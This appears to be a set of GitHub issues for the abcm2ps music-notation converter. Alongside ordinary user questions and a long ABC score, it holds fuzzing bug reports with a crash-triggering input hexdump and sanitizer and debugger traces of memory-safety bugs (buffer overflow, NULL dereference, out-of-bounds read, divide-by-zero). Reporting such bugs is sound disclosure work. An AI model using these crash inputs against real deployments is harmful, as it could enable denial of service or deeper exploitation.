abcm2ps is a command line program which converts ABC to music sheet in PostScript or SVG format. It is an extension of abc2ps which may handle many voices per staff. abcm2ps is Copyright © 2014-2016 Jean-Francois Moine.
Home Page: http://moinejf.free.fr/
License: GNU General Public License v3.0
Reproducer: abcm2ps-global-buffer-overflow-draw.c-draw_acc.abc.zip (SHA1:
bd48041d13a2e3f59113e6a119d28a1ecee947ca)
Tested in: 070cfe6
Fuzzing tool used: afl-2.52b
00000000 58 3a 30 0a 54 3a 30 30 24 24 24 24 3e 24 24 24 |X:0.T:00$$$$>$$$|
00000010 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 |$$$$$$$$$$$$$$$$|
00000020 24 24 24 24 0a 4b 3a 47 3d 20 41 32 42 41 30 0a |$$$$.K:G= A2BA0.|
00000030 20 20 47 41 42 63 20 64 65 64 42 7c 64 65 64 42 | GABc dedB|dedB|
00000040 20 64 65 64 40 7c 63 32 65 63 20 42 32 64 42 7c | ded@|c2ec B2dB||
00000050 41 32 46 32 20 47 34 3a 7c 0a 7c 3a 67 32 67 66 |A2F2 G4:|.|:g2gf|
00000060 20 67 64 42 64 7c 67 32 66 32 20 65 32 64 32 7c | gdBd|g2f2 e2d2||
00000070 63 32 65 63 20 42 32 64 42 7c 63 32 66 7c 0a 20 |c2ec B2dB|c2f|. |
00000080 20 67 32 64 00 00 00 7f | g2d....|
00000088
./abcm2ps abcm2ps-global-buffer-overflow-draw.c-draw_acc.abc
abcm2ps-8.13.20 (2018-02-21)
File abcm2ps-global-buffer-overflow-draw.c-draw_acc.abc
abcm2ps-global-buffer-overflow-draw.c-draw_acc.abc:3:4: error: Missing note after accidental
3 K:G= A2BA0
^
abcm2ps-global-buffer-overflow-draw.c-draw_acc.abc:4:20: error: Bad character
4 GABc dedB|dedB ded@|c2ec B2dB|A2F2 G4:|
^
=================================================================
==8898==ERROR: AddressSanitizer: global-buffer-overflow on address 0x555c6e86c678 at pc 0x555c6e51ba86 bp 0x7fffeadf33e0 sp 0x7fffeadf33d8
READ of size 8 at 0x555c6e86c678 thread T0
#0 0x555c6e51ba85 in draw_acc /home/hsalo/src/abcm2ps/draw.c:980
#1 0x555c6e51ba85 in draw_keysig /home/hsalo/src/abcm2ps/draw.c:1143
#2 0x555c6e51ba85 in draw_symbols /home/hsalo/src/abcm2ps/draw.c:4785
#3 0x555c6e51ba85 in draw_all_symb /home/hsalo/src/abcm2ps/draw.c:4835
#4 0x555c6e58805e in output_music /home/hsalo/src/abcm2ps/music.c:5141
#5 0x555c6e5b3d20 in generate /home/hsalo/src/abcm2ps/parse.c:1039
#6 0x555c6e5db37c in gen_ly /home/hsalo/src/abcm2ps/parse.c:1060
#7 0x555c6e5db37c in do_tune /home/hsalo/src/abcm2ps/parse.c:3621
#8 0x555c6e4599b0 in abc_eof /home/hsalo/src/abcm2ps/abcparse.c:200
#9 0x555c6e533df8 in frontend /home/hsalo/src/abcm2ps/front.c:905
#10 0x555c6e451f3e in treat_file /home/hsalo/src/abcm2ps/abcm2ps.c:239
#11 0x555c6e44e2b6 in main /home/hsalo/src/abcm2ps/abcm2ps.c:1040
#12 0x7fd7400dd2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
#13 0x555c6e450649 in _start (/home/hsalo/src/abcm2ps/abcm2ps+0x37649)
0x555c6e86c678 is located 40 bytes to the left of global variable 'yn' defined in 'format.c:479:14' (0x555c6e86c6a0) of size 16
0x555c6e86c678 is located 8 bytes to the right of global variable 'acc_tb' defined in 'draw.c:27:14' (0x555c6e86c640) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow /home/hsalo/src/abcm2ps/draw.c:980 in draw_acc
Shadow bytes around the buggy address:
0x0aac0dd05870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aac0dd05880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aac0dd05890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aac0dd058a0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0aac0dd058b0: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=>0x0aac0dd058c0: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 f9[f9]
0x0aac0dd058d0: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0aac0dd058e0: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0aac0dd058f0: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0aac0dd05900: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 f9
0x0aac0dd05910: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8898==ABORTING
Fun fact when running geeqie in Debian stable (stretch 1:1.3-1+b1) for the output SVG:
Thread 1 "geeqie" received signal SIGSEGV, Segmentation fault.
__memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:301
301 ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
(gdb) bt
#0 __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:301
#1 0x00007ffff4c5fd06 in ?? () from /usr/lib/x86_64-linux-gnu/libexiv2.so.14
#2 0x00007ffff4c59375 in Exiv2::PreviewManager::getPreviewImage(Exiv2::PreviewProperties const&) const () from /usr/lib/x86_64-linux-gnu/libexiv2.so.14
#3 0x00007ffff4c6d8f7 in Exiv2::Rw2Image::readMetadata() () from /usr/lib/x86_64-linux-gnu/libexiv2.so.14
I'm using abcm2ps 8.13.17 and pango 1.40.14, both installed through Homebrew on Mac OS X 10.12 (Sierra). When I attempt to use abcm2ps to process ABC files containing certain non-ASCII characters (see below for more on which ones), it works perfectly for SVG output, but for PostScript output, abcm2ps crashes with the following error messages:
(process:74759): GLib-GObject-WARNING **: invalid cast from 'PangoCairoCoreTextFont' to 'PangoFcFont'
(process:74759): Pango-CRITICAL **: pango_fc_font_lock_face: assertion 'PANGO_IS_FC_FONT (font)' failed
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
(process:74759): Pango-CRITICAL **: pango_fc_font_unlock_face: assertion 'PANGO_IS_FC_FONT (font)' failed
The characters that can trigger this error include ’ U+2019 RIGHT SINGLE QUOTATION MARK and — U+2014 EM DASH, as well as letters from non-Roman scripts such as Cyrillic, but not × U+00D7 MULTIPLICATION SIGN. I've tried turning off Pango with the --pango 0 option, but while that prevents the crash, it also means that these characters don't show up in the output. Help?
My abc file has unicode apostrophe and quotes in the words but abcm2ps is returning notdef in both ps and eps output. How do I go about getting it to work with ps/eps?
When using diagram in conjunction withchordnames, diagrams for chords that no longer use common english notation are not shown.
X:1
%%chordnames C,D,E,F,G,A,H % German
%%diagram 1
K:C
V:1 treble
"C"C "D"D "E"E "F"F "G"G "A"A "B"B "C"c
Tested environment : 64-bit ubuntu 16.04 LTS
Affected version : 8.14.1-master
Command :
./abcm2ps r -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10
Vulnerable code :
value = parse.deco_tb[s->u.user.value - 128];
if (strcmp(value, "beambreak") == 0)
char_tb[c] = CHAR_SPAC;
Debug:
GDB :
In function get_user() in abcparse.c
value = parse.deco_tb[s->u.user.value - 128];
if (strcmp(value, "beambreak") == 0)
char_tb[c] = CHAR_SPAC;
else if (strcmp(value, "ignore") == 0)
char_tb[c] = CHAR_IGN;
else if (strcmp(value, "nil") == 0
|| strcmp(value, "none") == 0)
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] 0x55555555dbdb → get_user(p=0x5555557f4a27 "tenu", s=0x55555580da68)
[#1] 0x55555555fb7b → parse_info(p=0x5555557f4a22 "M = !tenu")
[#2] 0x555555561edd → parse_line(p=0x5555557f4a20 "U:M = !tenu")
[#3] 0x555555561edd → abc_parse(p=0x5555557f4a20 "U:M = !tenu", fname=0x5555557f39f0 "POC", ln=0x3)
[#4] 0x555555579a54 → txt_add_eos(fname=0x5555557f39f0 "POC", linenum=0x3)
[#5] 0x555555579ee4 → frontend(s=<optimized out>, ftype=<optimized out>, fname=<optimized out>, linenum=<optimized out>)
[#6] 0x55555555ce2d → treat_file(fn=0x7fffffffe26a "POC", ext=<optimized out>)
[#7] 0x55555555b9e1 → main(argc=0x17, argv=0x7fffffffde38)
gef➤ p parse.deco_tb
$1 = {0x0 <repeats 128 times>}
gef➤ ptype value
type = char *
gef➤ p value
$2 = 0x0
gef➤ i r
rax 0x0 0x0
rbx 0x5555557f4a27 0x5555557f4a27
rcx 0xa 0xa
rdx 0x5555557c49a0 0x5555557c49a0
rsi 0x0 0x0
rdi 0x5555555a3005 0x5555555a3005
rbp 0x4d 0x4d
rsp 0x7fffffffd850 0x7fffffffd850
r8 0xe 0xe
r9 0x1 0x1
r10 0xc 0xc
r11 0x246 0x246
r12 0x55555580da68 0x55555580da68
r13 0x5555557b5060 0x5555557b5060
r14 0x55555580fb9e 0x55555580fb9e
r15 0x0 0x0
rip 0x55555555dbdb 0x55555555dbdb <get_user+203>
eflags 0x10282 [ SF IF RF ]
cs 0x33 0x33
ss 0x2b 0x2b
ds 0x0 0x0
es 0x0 0x0
fs 0x0 0x0
gs 0x0 0x0
Reproducer file - Reproducer
Is there a way to have text (in W:, or %%begintext ... %%endtext, or something else) automatically wrap to multiple lines, following the same width as staffwidth?
This abc parse to svg 8va is error, Ped and ✲ show direction error, is left andr right, not top and bottom:
X:1
T:lxq
Z:?
%%scale 0.85
%%pagewidth 21.00cm
%%leftmargin 1.89cm
%%rightmargin 1.26cm
%%score { 1 | 2 }
L:1/4
Q:1/4=176
M:4/4
I:linebreak $
K:C
V:1 treble nm="MusicXML Part"
L:1/16
V:2 bass
V:1
"^Allegro()""^legato"!f! !1!z[I:staff +1] C,"_2"G,"_4"C"^5""^1"[I:staff -1] !>!ECGc"^2""^4""^5" !>!ecgc'!8va(! !>!e'c'g'c'' | %1
!>!e''c''g'c'!8va)! !>!e'c'gc !>!ecGC !>!EC[I:staff +1]G,C, |$ %2
[I:staff -1] !1!z[I:staff +1] C,"_2"A,!3!C"^5"[I:staff -1] F"^1"C"^2"A!3!c fcac'!8va(! f'c'a'c'' | %3
"^5" e''"^4"c''"^2"a'"^1"c'!8va)!"^5" e'c'ac ecAC !>!DC[I:staff +1]A,C, | %4
[I:staff -1] z[I:staff +1] B,,G,!4!B,"^5"[I:staff -1] DB,GB dBgb d'!8va(!bg'a' |$ %5
"^5" d''"^3"a'"^2"^f'"^1"c'!8va)!"^5" d'"^3"a"^2"^f"^1"c dA^FC D[I:staff +1]A,^F,C, | %6
[I:staff -1] z[I:staff +1] !1!C,!2!=F,"_3"_A,"^5"[I:staff -1] D"^1"CF_A dcf_a!8va(! d'c'f'_a' |$ %7
"^5" d''"^3"g'"^2"f'"^1"b!8va)!"^5" d'gfB dGFB,"^5" !>!^D[I:staff +1]G,F,B,, | %8
[I:staff -1] z[I:staff +1] C,G,C[I:staff -1] ECGc ecgc'!8va(! e'c'g'c'' |$ %9
e''c''g'c'!8va)! e'c'gc ecGC EC[I:staff +1]G,C, | %10
[I:staff -1] z[I:staff +1] !1!C,!2!F,!4!C[I:staff -1] !5!F!1!C!2!F!4!c !5!fcfc'!8va(! f'c'f'c'' |$ %11
"^5" e''"^4"c''"^2"^f'"^1"c'!8va)!"^5" e'c'^fc ec^FC EC[I:staff +1]^F,C, | %12
[I:staff -1] z[I:staff +1] !1!C,!2!G,!4!C"^5"[I:staff -1] DCGc dcgc'!8va(! d'c'g'c'' | %13
d''b'g'b!8va)! d'bgB dBGB, DB,[I:staff +1]G,B,, |$ %14
[I:staff -1] z[I:staff +1] !1!D,!2!G,!4!D"^5"[I:staff -1] EDGd edgd'!8va(! e'd'g'd'' | %15
"^5" e''"^4"c''"^2"g'"_1"c'!8va)!"^5" e'c'gc ecGC EC[I:staff +1]G,C, |$ %16
[I:staff -1] z[I:staff +1] !1!E,!2!C[I:staff -1]!4!E"^5" FEce fec'e'!8va(! f'e'c''e'' | %17
"^5" f''"^4"d''"^2"b'"^1"d'!8va)!"^5" f'd'bd fdBD FDB,[I:staff +1]D, |$ %18
[I:staff -1] z[I:staff +1] !1!D,!2!B,!4!D"^5"[I:staff -1] E"^1"DBd edbd'!8va(! e'd'b'd'' | %19
"^5" e''"^4"c''"^2"a'"_1"c'!8va)!"^5" e'c'ac ecAC EC[I:staff +1]A,C, |$ %20
[I:staff -1] z[I:staff +1] !1!C,!2!A,!4!C"^5"[I:staff -1] E"^1"CAc ecac' e'!8va(!c'a'c'' | %21
!5!^d''!3!!4!b'!2!!3!a'!1!b!8va)! !5!^d'!3!!4!b!2!!3!a!1!B ^dBAB, ^D[I:staff +1]B,A,B,, | %22
[I:staff -1] z[I:staff +1] !1!B,,!2!A,!3!B,"_5"[I:staff -1] E"_1"B,!2!A!3!B !5!eBab e'!8va(!ba'b' |$ %23
"^5" e''"^3"b'"^2"^g'"^1"!8va)!b"^5" e'"^3"b^gB eB^GB, EB,[I:staff +1]^G,B,, | %24
[I:staff -1] z[I:staff +1] !1!E,!2!A,!3!^C[I:staff -1] !5!=GEA^c gea^c' g'c'ae | %25
"^5" g'"^3"=c'"^2"a"^1"e"^5" gcAE GC[I:staff +1]A,E,[I:staff -1] ^FC[I:staff +1]A,D, |$ %26
[I:staff -1] z[I:staff +1] !1!D,!2!G,!3!C[I:staff -1] !5!=FDGc fdgc'!8va(! f'd'g'c'' | %27
"^5" f''"^3"b'"^2"g'"_1"d'!8va)!"^5" f'bgd fBGD F[I:staff +1]B,G,D, | %28
[I:staff -1] z[I:staff +1] !1!C,!2!G,!3!_B,[I:staff -1] !5!E!1!C!2!G!3!_B !5!ecg_b!8va(! e'c'g'c'' |$ %29
"^5" _e''!3!!4!_b'"^2"_e'"_1"c'!8va)!"^5" _e'_b_ec e_B_EC E_B,[I:staff +1]_E,C, | %30
[I:staff -1] z[I:staff +1] !1!C,!2!_E,!3!A,[I:staff -1] !5!_ECEA _ecea!8va(! _e'c'e'a' |$ %31
"^5" _e''"^3"_a'"^2"_e'"_1"!8va)!_c'"^5" _e'_a_e_c e_A_E_C E[I:staff +1]_A,_E,_C, | %32
[I:staff -1] z[I:staff +1] !1!_B,,!2!F,!3!_A,[I:staff -1] !5!=D!1!_B,F_A"_cresc." dBf_a!8va(! d'_bf'_a' |$ %33
"^5" d''"^3"^g'"^2"=e'"_1"!8va)!_b"^5" d'^g=e_B d^GE_B, D[I:staff +1]^G,E,_B,, | %34
[I:staff -1] z[I:staff +1] !1!A,,!2!E,!4!A,[I:staff -1] !5!^CA,EA ^cAea!8va(! ^c'ae'a' |$ %35
^c''a'e'a!8va)!"_dim." ^c'aeA ^cAEA, ^C[I:staff +1]A,E,A,, | %36
[I:staff -1] z[I:staff +1] !1!A,,!2!D,!3!^F,"^5"[I:staff -1] =CA,D^F cAd^f c'ad'^f' |$ %37
"^5"!8va(! c''"^3"=f'"^2"d'"_1"g!8va)!"^5" c'fdG cFD[I:staff +1]G, !>!B,F,D,G,, | %38
[I:staff -1] !1!z[I:staff +1] !2!!3!G,,C,E,"_5" B,G,[I:staff -1]CE BGce bgc'e' | %39
"^5" b'"^3"e'"^2"c'"^1"f"^5" becF BEC[I:staff +1]F, !>!A,E,C,F,, |$ %40
[I:staff -1] z[I:staff +1] !1!F,,!2!B,,!3!D,"_5" A,F,B,[I:staff -1]D AFBd afbd' | %41
g'd'be gdB"^1"E"_cresc.""^2" A"^3"c"^5"g"^1"e ac'g'"^4"e' | %42
"^5" f'"^3"c'"^2"a"^1"d"^5" fcA"^1"D"^2" G"^3"B"^5"f"^1"d gbf'"^4"d' |$ %43
"^5" e'"^3"b"^2"g"_1"c"^5" eBGC FAec fae'c' | %44
!f!"^5" d'"^3"a"^2"f"^1"B dAFB, D[I:staff +1]A,F,B,,[I:staff -1] z4 | %45
^d'a^fB ^dA^FB, ^D[I:staff +1]A,^F,B,,[I:staff -1] z4 |$ %46
z[I:staff +1] !1!B,,!2!E,!3!^G,"^5"[I:staff -1] E"^1"B,E^G eBe^g!8va(! e'be'^g' | %47
"^5" e''"^3"^g'"^2"e'"^1"b!8va)!"^5" e'"_dim."^geB e^GEB, !>!=FB,[I:staff +1]=G,D, |$ %48
[I:staff -1] z[I:staff +1] !1!C,!2!G,!4!C"^5"[I:staff -1] ECGc ecgc'!8va(! e'c'g'c'' | %49
e''c''g'c'!8va)! e'c'gc ecGC EC[I:staff +1]G,C, | %50
[I:staff -1] z[I:staff +1] !1!C,!2!A,!4!C[I:staff -1] FCAc fcac'!8va(! f'c'a'c'' |$ %51
e''c''a'c'!8va)! e'c'ac ecAC !>!DC[I:staff +1]A,C, | %52
[I:staff -1] z[I:staff +1] B,,G,B,[I:staff -1] DB,GB dBgb!8va(! d'bg'a' | %53
d''a'^f'c'!8va)! d'a^fc dA^FC D[I:staff +1]A,^F,C, |$ %54
[I:staff -1] z[I:staff +1] !1!C,!2!=F,"_3"_A,"^5"[I:staff -1] D"^1"CF_A dcf_a!8va(! d'c'f'_a' | %55
d''g'f'b!8va)! d'gfB dGFB, !>!^D[I:staff +1]G,F,B,, | %56
[I:staff -1] z[I:staff +1] C,G,C[I:staff -1] ECGc ecgc'!8va(! e'c'g'c'' |$ %57
e''c''g'c'!8va)! e'c'gc ecGC EC[I:staff +1]G,C, | %58
[I:staff -1] z[I:staff +1] !1!C,!2!F,!4!C[I:staff -1] !5!F!1!CFc fcfc'!8va(! f'c'f'c'' | %59
e''c''^f'c'!8va)! e'c'^fc _ec^FC !>!_EC[I:staff +1]^F,C, |$ %60
[I:staff -1] z[I:staff +1] !1!C,!2!G,!4!C"^5"[I:staff -1] DCGc dcgc'!8va(! d'c'g'c'' | %61
"^5" d''"^4"b'"^2"g'"^1"b!8va)! d'bgB dBGB, DB,[I:staff +1]G,B,, | %62
[I:staff -1] z[I:staff +1] !1!C,"_2"A,"_4"C"^5"[I:staff -1] DCAc dcac' d'!8va(!c'a'c'' |$ %63
"^5" _e''"^4"c''"^2"a'"^1"c'!8va)!"^5" _e'"^4"c'ac"^5" !>!^d!3!!4!BA"^2""^1"B,"^5" !>!^D"^3"B,[I:staff +1]A,B,, | %64
[I:staff -1] z[I:staff +1] !1!B,,!2!!3!^G,B,"^5"[I:staff -1] E!1!B,"^2"^G"^3"B"^5" eA^gb e!8va(!b^g'b' | %65
"^5" e''"^3"b'"^2"^g'"^1"b!8va)! e'b^gB eB^GB, EB,[I:staff +1]^G,B,, |$ %66
[I:staff -1] z"_1"[I:staff +1] D,!2!A,!3!C"^5"[I:staff -1] FDAc fdac'!8va(! f'd'a'c'' | %67
"_5" f''"_3"b'"_2"g'"_1"d'!8va)! f'bgd fBGD FB,[I:staff +1]G,D, | %68
[I:staff -1] z"_1"[I:staff +1] C,!2!G,!4!C"_5"[I:staff -1] E!1!CGc"_cresc." ec_bc' !>!!5!g'c'be |$ %69
"^5" !>!^f'"^3"c'"^2"a"^1"_e"^5" !>!^fcA_E !>!=fB_AD !>!=FB,[I:staff +1]_A,D, | %70
[I:staff -1] z[I:staff +1] !1!C,!2!G,!4!C[I:staff -1] !5!ECGc ecgc' ecgc' | %71
"^5"!>(! _e'"^3"a"^2"^f"^1"c"^5" _eA^FC!>)! d_A=FB, D[I:staff +1]_A,F,B,, |$ %72
[I:staff -1] z[I:staff +1] !1!_B,,!2!=E,!3!G,"_5"[I:staff -1] _D"^1"_B,EG _d_Beg!8va(! _d'_be'g' | %73
"_5" _d''"_3"^f'"_2"_e'"_1"a!8va)!"_5"!>(! _d'^f_eA _d^F!>)!_EA, cFEA, |$ %74
z"^1" _A,"^2"=D"^3"=F"^5" c_A=df c'_ad'f' c''f'd'a | %75
"^5" b'"^3"f'"^2"d'"^1"g"_dim.""^5" bfdG BFD[I:staff +1]G, B,F,D,G,, |$ %76
[I:staff -1] z[I:staff +1] !1!G,,!2!E,!3!G, !5!CG,[I:staff -1]EG!<(! cGeg!8va(! c'ge'!<)!g' | %77
!>(! c''g'e'g!8va)! c'geG cGE!>)![I:staff +1]G, CG,E,G,, |[I:staff -1] !fermata!z16 |] %79
V:2
!ped! [C,,C,]4- | [C,,C,]4!ped-up! |$!ped! [F,,,F,,]4 |!ped!!ped-up! [^F,,,^F,,]4 | %4
([G,,,G,,]2 [^F,,,^F,,] [E,,,E,,] |$!ped! [D,,,D,,]4) | [G,,,G,,]4- |$!ped!!ped-up! [G,,,G,,]4 | %8
!ped! [C,,C,]4-!ped-up! |$!ped! [C,,C,]4!ped-up! |!ped!!ped-up! [A,,,A,,]4- |$!ped! [A,,,A,,]4 | %12
!ped-up!!ped! [G,,,G,,]4- |!ped!!ped-up! [G,,,G,,]4 |$ [C,,C,]4- |!ped! [C,,C,]4!ped-up! |$ %16
!ped! [A,,,A,,]4 |!ped! [B,,,B,,]2 [A,,,A,,]2!ped-up! |$!ped! [^G,,,^G,,]4 | %19
!ped!!ped-up! [A,,,A,,]2 [=G,,,=G,,]2 |$ [F,,,F,,]4- |!ped! [F,,,F,,]4!ped-up! | %22
!ped!!ped-up! [E,,,E,,]4- |$!ped! [E,,,E,,]4!ped-up! |!ped! [A,,,A,,]4 |!ped!!ped-up! [D,,D,]4 |$ %26
[G,,,G,,]4- |!ped! [G,,,G,,]4!ped-up! | x4!ped!!ped-up! |$!ped! [_G,,,_G,,]4 | %30
!ped-up!!ped! [F,,,F,,]4!ped-up! |$!ped! [_C,,_C,]4 |!f!!ped!!ped-up! _B,,,4- |$ %33
!ped! [_B,,,_B,,]4!ped-up! |!f!!ped!!ped-up! [A,,,A,,]4- |$!ped! [A,,,A,,]4 |!ped!!ped-up! D,,4 |$ %37
!ped! [G,,,G,,]4!ped-up! |!ped!!ped-up! C,,4 |!ped!!ped-up! [F,,,F,,]4 |$!ped! B,,,4!ped-up! | %41
!ped!!ped-up! [E,,,E,,]2!ped-up!!ped! [A,,,A,,]2 | %42
!ped!!ped-up! [D,,,D,,]2!ped!!ped-up! [G,,,G,,]2 |$ %43
!ped! [C,,,C,,]2!ped-up!!ped! [F,,,F,,]2!ped-up! |!ped!!ped-up! [B,,,B,,]3 B,,,- | %45
!ped! [B,,,B,,]3!ped-up! B,,, |$ [E,,,E,,]4- | %47
!ped! [E,,,E,,]3!ped-up!!>(!!ped-up!!ped! [D,,,D,,]!>)! |$!ped! [C,,,C,,-]4!ped-up! | [C,,C,]4 | %50
!ped!!ped-up! [F,,,F,,]4 |$!ped-up!!ped! [^F,,,^F,,]4 | %52
!ped-up!!ped! ([G,,,G,,]2 [^F,,,^F,,] [E,,,E,,] |!ped! [D,,,D,,]4)!ped-up! |$!ped! [G,,,G,,]4- | %55
!ped!!ped-up! [G,,,G,,]4 |!ped!!ped-up! [C,,C,]4- |$ [C,,C,]4 |!ped!!ped-up! [A,,,A,,]4- | %59
!ped-up!!ped! [A,,,A,,]3!ped! [_A,,,_A,,] |$!ped-up!!ped! [G,,,G,,]4- |!ped!!ped-up! [G,,,G,,]4 | %62
!ped!!ped-up! [^F,,,^F,,]4 |$!ped! [=F,,,=F,,]4!ped-up!!ped! |!ped! [E,,,E,,-]4!ped-up! | %65
[E,,E,]4 |$!ped! D,,4!ped-up! |!ped!!ped-up! [G,,,G,,]4 |!ped!!ped-up! C,,4- |$ %69
!ped! [C,,C,]4!ped-up!!ped! |!ped! C,,4!<(!!<)! |!ped!!ped-up! [G,,,G,,]4!ped!!ped-up! |$ %72
!ped! [G,,,G,,]4-!ped-up! |!ped!!ped-up! [G,,,G,,]4 |$!ped! [G,,,G,,]4-!ped-up!!<(!!<)! | %75
!ped!!ped-up! [B,,,G,,]4!>(!!>)! |$ [C,,,C,,]4- | [C,,,C,,]4 | !fermata![C,,,C,,]4 |] %79
Hi leesavide,
A big thanks for maintaining git versionning for abc tools.
However I was not able to compile abcm2ps from the cloned repo.
Comparing with the contents of abcm2ps-8.13.1.tar.gz, there where two missing files:
Makefile.inconfig.h.inActually they were excluded in your .gitignore file (a bit bulky to my taste if I may say).
Also maybe Makefile should not be versionned since it is generated, but it is included in official source, so I left it in.
Here is my proposed patch (git diff):
compilable.patch.txt
Hope this helps
Hi,
I'm hitting this bug in the latest version of abcm2ps (abcm2ps-8.13.21 (2018-05-05))
valgrind ./abcm2ps report2.abc
==17297== Memcheck, a memory error detector
==17297== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==17297== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==17297== Command: ./abcm2ps report2.abc
==17297==
abcm2ps-8.13.21 (2018-05-05)
File report2.abc
report2.abc:127:20: error: Invalid note duration
report2.abc:127:20: error: Note too much dotted
report2.abc:127:20: error: Invalid note duration
report2.abc:127:20: error: Note too much dotted
==17297== Invalid read of size 4
==17297== at 0x4123B0: calculate_beam (draw.c:352)
==17297== by 0x418F3C: draw_sym_near (draw.c:4097)
==17297== by 0x4295CB: delayed_output (music.c:5085)
==17297== by 0x4295CB: output_music (music.c:5140)
==17297== by 0x42E1F0: generate (parse.c:1039)
==17297== by 0x42E877: gen_ly (parse.c:1060)
==17297== by 0x43433F: do_tune (parse.c:3621)
==17297== by 0x405488: abc_eof (abcparse.c:200)
==17297== by 0x41FA44: frontend (front.c:905)
==17297== by 0x403FAC: treat_file (abcm2ps.c:239)
==17297== by 0x4030E7: main (abcm2ps.c:1040)
==17297== Address 0x400447dbc is not stack'd, malloc'd or (recently) free'd
==17297==
==17297==
==17297== Process terminating with default action of signal 11 (SIGSEGV)
==17297== Access not within mapped region at address 0x400447DBC
==17297== at 0x4123B0: calculate_beam (draw.c:352)
==17297== by 0x418F3C: draw_sym_near (draw.c:4097)
==17297== by 0x4295CB: delayed_output (music.c:5085)
==17297== by 0x4295CB: output_music (music.c:5140)
==17297== by 0x42E1F0: generate (parse.c:1039)
==17297== by 0x42E877: gen_ly (parse.c:1060)
==17297== by 0x43433F: do_tune (parse.c:3621)
==17297== by 0x405488: abc_eof (abcparse.c:200)
==17297== by 0x41FA44: frontend (front.c:905)
==17297== by 0x403FAC: treat_file (abcm2ps.c:239)
==17297== by 0x4030E7: main (abcm2ps.c:1040)
==17297== If you believe this happened as a result of a stack
==17297== overflow in your program's main thread (unlikely but
==17297== possible), you can try to increase the size of the
==17297== main thread stack using the --main-stacksize= flag.
==17297== The main thread stack size used in this run was 8388608.
==17297==
==17297== HEAP SUMMARY:
==17297== in use at exit: 957,953 bytes in 120 blocks
==17297== total heap usage: 153 allocs, 33 frees, 2,220,269 bytes allocated
==17297==
==17297== LEAK SUMMARY:
==17297== definitely lost: 0 bytes in 0 blocks
==17297== indirectly lost: 0 bytes in 0 blocks
==17297== possibly lost: 0 bytes in 0 blocks
==17297== still reachable: 957,953 bytes in 120 blocks
==17297== suppressed: 0 bytes in 0 blocks
==17297== Rerun with --leak-check=full to see details of leaked memory
==17297==
==17297== For counts of detected and suppressed errors, rerun with: -v
==17297== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
It is a read access violation (calculate_beam
report2.zip
(draw.c:352))
stem_err = min_tb[0][(unsigned) s->nflags];
gef➤ p s->nflags
$1 = 0xff
gef➤ p min_tb[0][(unsigned) s->nflags]
Cannot access memory at address 0x400447dbc
The value of s->nflags could be controlled by an attacker but I did not do a thorough analysis.
Hi,
I'm hitting this bug in the latest version of abcm2ps (abcm2ps-8.13.21 (2018-05-05))
valgrind ./abcm2ps report4.abc
==17600== Memcheck, a memory error detector
==17600== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==17600== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==17600== Command: ./abcm2ps report4.abc
==17600==
abcm2ps-8.13.21 (2018-05-05)
File report4.abc
report4.abc:92:0: error: Bad voice ID in %%staves
report4.abc:92:0: error: Voice '144' of %%staves has no symbol
report4.abc:98:34: error: Decoration !-300349! not defined
report4.abc:107:63: error: Bad character
107 (3CDE(3FGA B/c/d/e/d/c/B/A/ (18506zDE(256FGz z/c/d/e/d/c/B/z/|(0CDz(3zGA ...
^
==17600==
==17600== Process terminating with default action of signal 8 (SIGFPE)
==17600== Integer divide by zero at address 0x803061278
==17600== at 0x434924: set_tuplet (parse.c:6056)
